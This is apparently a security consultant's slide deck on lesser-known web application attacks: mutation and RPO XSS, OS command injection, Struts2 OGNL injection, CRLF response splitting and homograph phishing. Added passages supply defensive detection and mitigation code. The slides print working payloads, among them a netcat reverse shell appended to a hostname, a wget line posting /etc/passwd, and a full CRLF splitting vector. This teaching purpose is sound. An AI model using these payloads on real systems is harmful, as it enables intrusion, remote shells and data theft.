Lesser Known WebApp Attacks
About me
• Consultant at Aujas Networks
• Part time bug hunter
• Individual security researcher
• Blogger: http://infinite8security.blogspot.in
Menu Card
• Cross site scripting
  - Mutation XSS
  - RPO XSS
  - Zombie XSS
• Remote Command Execution
• CR-LF Attack
• Homograph Attack
Cross site Scripting - Mutation XSS
HTML encoded payload:
<listing><img src=1 onerror=alert(1)></listing>
We put this piece of code into another piece of code by reading it back through the innerHTML property:
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code executes, the browser reads the innerHTML of the element returned by document.getElementById('x'). This results in multiple levels of decoding, and the payload mutates from a safe (encoded) state to an unsafe (active) one.
Mitigation:
Server-side mitigation
• Avoid outputting server content that the browser would otherwise convert incorrectly.
• Replace the flawed content with semantically equivalent content that the browser converts properly.
Client-side mitigation
• Browsers should implement ECMAScript 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all user agents.
• Reference: https://cure53.de/fp170.pdf
Cross site Scripting - RPO XSS
Relative Path Overwrite XSS
• Difference between absolute and relative URLs:
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this finding, three things are necessary:
1) Stored XSS that allows CSS injection.
2) URL rewriting.
3) Relative addressing of the CSS style sheet.
DEMO
• Step 1: Let's visit www.webdevelopersnotes.com/graphics/index.php3
• To check for URL rewriting, add '/' to the end of the URL.
• Open the rewritten URL with the XSS payload in IE and see the magic ;)
• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs are used throughout a site.
• Otherwise, root-relative URLs should be used.
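The mechanism behind the demo and the mitigation, as an added example that is not part of the original slides: a relative stylesheet href resolves against the page URL, so once URL rewriting lets the page be reached with a trailing path segment, the browser asks for the stylesheet underneath the page's own path and the server answers with the page itself. The host example.test and the hrefs are constructed for illustration; `audit` reports which hrefs should be rewritten as absolute or root-relative.

```python
# Added example, not from the original slides: how a relative stylesheet
# reference resolves once URL rewriting lets the page be reached under a
# trailing path segment, and why an absolute or root-relative href is the fix.
# The host example.test and the hrefs are constructed for illustration.
from urllib.parse import urljoin, urlsplit


def resolve_stylesheet(page_url: str, href: str) -> str:
    """Resolve an href the way a browser does for <link rel=stylesheet>."""
    return urljoin(page_url, href)


def is_rpo_candidate(page_url: str, href: str) -> bool:
    """True when a relative href resolves *underneath* the page's own path.

    If the server ignores the trailing path info (URL rewriting), the request
    for the stylesheet is answered by the page itself, so any CSS a user can
    inject into that page is parsed as the site's style sheet.
    """
    if href.startswith(("/", "http://", "https://")):
        return False  # root-relative or absolute: independent of the page path
    page_path = urlsplit(page_url).path
    resolved_path = urlsplit(resolve_stylesheet(page_url, href)).path
    return resolved_path.startswith(page_path.rstrip("/") + "/")


def audit(page_url: str, hrefs) -> list:
    """Return the hrefs on a page that should be rewritten as root-relative."""
    return [h for h in hrefs if is_rpo_candidate(page_url, h)]


if __name__ == "__main__":
    normal = "http://example.test/graphics/index.php3"
    rewritten = normal + "/"  # the trailing '/' test from the demo
    for page in (normal, rewritten):
        print(page, "->", resolve_stylesheet(page, "style.css"))
    print("needs fixing:", audit(rewritten, ["style.css", "/graphics/style.css"]))
```

Without the trailing slash `style.css` resolves to `/graphics/style.css`; with it, to `/graphics/index.php3/style.css`, which is exactly the page again. A root-relative `/graphics/style.css` resolves the same way in both cases, which is why the mitigation above works.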
Remote/OS Command Execution
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Now what if ( ; ) is blocked by the application?
X ; Y = Separating commands (run X and then Y, regardless of the success of X)
X | Y = PIPE (run X and pass the output of X to Y)
X ^ Y = PIPEZ
X && Y = AND (run Y if X succeeded)
X || Y = OR (run Y if X failed)
X %0D Y %0D Z = OR
` X ` = Backtick (command substitution)
` X & Y ` = Background (run Y and then run X in the background, regardless of the success of X)
$( command ) = Command substitution
nc -e /bin/sh = Netcat
wget --post-file /etc/passwd = WGET
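The defensive side of this list, as an added example that is not part of the original slides: a request value that ends up in an OS command is allow-listed as a bare hostname, the command is built as an argv list so no shell ever parses it, and a detector flags the separators listed above even when they arrive URL-encoded (`%0D` for CR, `%26%26` for `&&`). The hostname regex, `ping` as the wrapped command and the sample values are assumptions for illustration.

```python
# Added example, not from the original slides: a request parameter that ends
# up in an OS command is allow-listed first, the command is built as an argv
# list so no shell ever parses it, and a detector flags the separators listed
# above in (possibly URL-encoded) input.  Sample values are constructed.
import re
import subprocess
from urllib.parse import unquote

# Separators and substitution syntax from the list above.  Checked after
# URL-decoding so %0D / %0A (CR / LF) and %26%26 (&&) are caught as well.
SHELL_METACHARS = re.compile(r"[;|&`$()<>^\r\n]")

# Strict DNS hostname: labels of letters, digits and inner hyphens only.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def looks_injected(value: str) -> bool:
    """Detection: does the (decoded) parameter carry shell control syntax?"""
    decoded = unquote(unquote(value))  # tolerate double encoding
    return bool(SHELL_METACHARS.search(decoded))


def is_allowed_host(host: str) -> bool:
    """Allow-list: only a bare hostname gets through."""
    return bool(HOSTNAME.match(host))


def build_ping_argv(host: str) -> list:
    """Mitigation: reject anything that is not a bare hostname, then return
    the command as an argument list for subprocess (shell=False)."""
    if not is_allowed_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Run the allow-listed command; the value is a single argv element, so
    separators such as '&&' or ';' would be part of the hostname, not syntax."""
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)


def scan(values) -> list:
    """Return the values a monitor should flag."""
    return [v for v in values if looks_injected(v)]


# Constructed request values as they might appear in a parameter log.
SAMPLE_VALUES = [
    "www.example.test",
    "www.example.test && id",
    "www.example.test%0Did",
    "www.example.test%257Cid",  # double-encoded '|'
    "$(id).example.test",
]

if __name__ == "__main__":
    print("flagged:", scan(SAMPLE_VALUES))
    print("argv:", build_ping_argv("www.example.test"))
```

The allow-list is the real fix: every separator on the list above fails the hostname regex, so it never matters which one the application forgot to block. The detector is there for monitoring existing traffic, not as a substitute for the allow-list.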
RCE never dies!!!
Apache Struts2 RCE
• The "action:", "redirect:" or "redirectAction:" parameter prefix is not properly sanitized.
• The supplied information is evaluated as an OGNL (Object-Graph Navigation Language) expression against the value stack, which introduces the possibility of injecting server-side code.
http://host/struts2-blank/example/X.action?action:${3*4}
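A detection for this pattern in web server logs, as an added example that is not part of the original slides: requests whose query string starts a parameter with one of the three Struts prefixes and carries an OGNL expression (`${...}` or `%{...}`, possibly percent-encoded) are reported. The access-log lines are constructed in a common-log-like format and the regular expression for the request line is an assumption; adapt it to your server's format.

```python
# Added example, not from the original slides: flag requests whose query
# string uses the Struts 2 "action:", "redirect:" or "redirectAction:"
# prefixes together with an OGNL expression ("${...}" or "%{...}").
# The access-log lines are constructed in a common-log-like format.
import re
from urllib.parse import parse_qsl, urlsplit

PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_MARKER = re.compile(r"[$%]\{")
# Request line inside a common-log-style entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def find_ognl_prefix_params(url: str) -> list:
    """Return (name, value) pairs where a Struts prefix parameter carries OGNL.

    parse_qsl URL-decodes, so "%24%7B" is seen as "${"; with keep_blank_values
    a parameter without '=' (as in ?action:${3*4}) still comes back, with the
    expression sitting in the name.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.startswith(PREFIXES) and OGNL_MARKER.search(name + "=" + value):
            hits.append((name, value))
    return hits


def scan_log(lines) -> list:
    """Return (line_number, url, hits) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = find_ognl_prefix_params(match.group(1))
        if hits:
            findings.append((number, match.group(1), hits))
    return findings


# Constructed log lines; the second mirrors the request from the slide.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /struts2-blank/example/X.action HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2015:13:55:40 +0000] "GET /struts2-blank/example/X.action?action:${3*4} HTTP/1.1" 302 0',
    '203.0.113.5 - - [10/Oct/2015:13:55:44 +0000] "GET /struts2-blank/example/X.action?redirect:%25%7B3*4%7D HTTP/1.1" 302 0',
    '203.0.113.5 - - [10/Oct/2015:13:55:50 +0000] "GET /struts2-blank/example/X.action?action:login HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, url, hits in scan_log(SAMPLE_LOG):
        print("line %d: %s -> %s" % (number, url, hits))
```

The fourth line is a legitimate use of the prefix without an expression and is not flagged; the point of checking for `${` / `%{` after decoding is to keep the alert rate down while still catching percent-encoded variants. The fix on the server side remains upgrading Struts to a version that no longer evaluates these prefixes.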
Divide and Conquer: CR-LF Attack
• CR stands for Carriage Return (CR, ASCII 13, \r)
• LF stands for Line Feed (LF, ASCII 10, \n)
How does this attack work?
The server script embeds user data in HTTP response headers.
Example:
Step 1: There is a redirection page "redir_lang.jsp". When we hit the index page, the server responds with the following redirect, built from the lang parameter:
<% response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang")); %>
Let's Attack ;)
Step 3: Instead of passing the value English, let's pass our attack vector as shown:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Note: We have URL-encoded the CRLF sequences.
Let's see what the server responds with.
• A first HTTP response, which is a 302 (redirection) response.
• A second HTTP response, which is a 200 response, with content comprising 19 bytes of HTML.
• Superfluous data.
So when the attacker feeds the target with two requests, the first being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
and the second to the URL /index.html,
the target would believe that the first request is matched to the first response, and that the second request (to /index.html) is matched to the second response.
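The split shown above reproduced on raw bytes, as an added example that is not part of the original slides: the JSP redirect is mirrored by a Python function that concatenates the parameter into the Location header, a deliberately naive parser counts status lines the way a proxy or cache that does not track request/response pairing would, and a hardened version rejects CR/LF and percent-encodes the value. The payload is the one from the slide; the Python header builder stands in for the JSP and is an assumption.

```python
# Added example, not from the original slides: the redirect from the slide
# rebuilt in Python as a raw header writer (there is no JSP here), so the
# effect of the CRLF payload on the response bytes can be seen, next to a
# hardened version.  The payload is the one shown above; the parser is a
# deliberately naive one that splits wherever a new status line appears.
from urllib.parse import quote, unquote

# The attack vector from the slide, URL-decoded once as the server would do.
PAYLOAD = unquote(
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>"
)


def vulnerable_redirect(lang: str) -> bytes:
    """Mirrors response.sendRedirect("/by_lang.jsp?lang=" + lang): the raw
    parameter value is concatenated into the Location header."""
    headers = "HTTP/1.1 302 Found\r\nLocation: /by_lang.jsp?lang=%s\r\n\r\n" % lang
    return headers.encode("utf-8")


def is_safe_header_value(value: str) -> bool:
    """A header value may never contain a line terminator."""
    return "\r" not in value and "\n" not in value


def safe_redirect(lang: str) -> bytes:
    """Hardened: refuse CR/LF outright, then percent-encode the value so that
    nothing the user controls can terminate a header line."""
    if not is_safe_header_value(lang):
        raise ValueError("CR/LF not allowed in a header value")
    headers = ("HTTP/1.1 302 Found\r\nLocation: /by_lang.jsp?lang=%s\r\n\r\n"
               % quote(lang, safe=""))
    return headers.encode("utf-8")


def status_lines(raw: bytes) -> list:
    """Every line that starts with 'HTTP/1.' begins a response as far as a
    naive proxy or cache is concerned; a split response yields more than one."""
    return [line for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1.")]


if __name__ == "__main__":
    split = vulnerable_redirect(PAYLOAD)
    print("responses seen by a naive parser:", len(status_lines(split)))
    print(split.decode("utf-8"))
    print("safe:", safe_redirect("English").decode("utf-8"))
```

Rejecting CR/LF is the check that matters; the percent-encoding is defence in depth so that a value which slipped past validation still cannot start a new header line. Modern servlet containers apply the same rule to `sendRedirect`, which is why the demo relies on an older one.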
What can an attacker do with a CRLF attack?
• Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection
• Web cache poisoning (defacement)
• Cross-user attacks (single user, single page, temporary defacement)
• Hijacking pages with user-specific information
• Browser cache poisoning
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
What is this all about?
http://ebаy.com/
Converted to punycode:
http://xn--eby-7cd.com/
The "а" is a letter from the Cyrillic alphabet.
What can an attacker do with a homograph attack?
• Phishing
• Un-validated redirection
• Fake websites
• The attacker may combine this with SSL attacks:
http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
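The punycode conversion from the slide and a check that catches this class of lookalike, as an added example that is not part of the original slides: Python's built-in `idna` codec converts the host both ways, and `is_mixed_script` flags any label whose letters come from more than one script (Latin and Cyrillic in the ebay case), which is the signal browsers and mail filters use to decide whether to display the Unicode form at all. The script name is taken from each character's Unicode name, which is an approximation of the real Unicode script property; the hosts other than the slide's are constructed.

```python
# Added example, not from the original slides: the IDN from the slide is
# converted to and from punycode with Python's built-in idna codec, and a
# check flags host labels that mix scripts (Latin and Cyrillic here).
# Constructed hosts are used alongside the slide's; nothing touches the network.
import unicodedata
from urllib.parse import urlsplit


def to_punycode(host: str) -> str:
    """Unicode hostname -> ACE form (xn--...), label by label."""
    return host.encode("idna").decode("ascii")


def to_unicode(host: str) -> str:
    """ACE form -> Unicode; a hostname that is already Unicode is returned as is."""
    if host.isascii():
        return host.encode("ascii").decode("idna")
    return host


def scripts_in(label: str) -> set:
    """Script names taken from Unicode character names, e.g. 'CYRILLIC' from
    'CYRILLIC SMALL LETTER A'.  Digits and hyphens carry no script."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0]
            for ch in label if ch.isalpha()}


def is_mixed_script(host: str) -> bool:
    """A single label drawing from more than one script is the homograph
    pattern: 'eb' + Cyrillic 'а' + 'y' looks like 'ebay' but is not."""
    return any(len(scripts_in(label)) > 1
               for label in to_unicode(host).split("."))


def suspicious_url(url: str) -> bool:
    """Apply the check to a URL's host, whether it arrives as ACE or Unicode."""
    host = urlsplit(url).hostname or ""
    return is_mixed_script(host)


if __name__ == "__main__":
    lookalike = "xn--eby-7cd.com"  # from the slide
    print(lookalike, "->", to_unicode(lookalike), "mixed:", is_mixed_script(lookalike))
    print("ebay.com mixed:", is_mixed_script("ebay.com"))
```

Whole-label checks are what make this usable: a legitimately Cyrillic domain has a single script per label and is not flagged, while a label that needs two alphabets to spell an English brand is. For production use, a proper Unicode script table and confusable data should replace the character-name heuristic.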
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad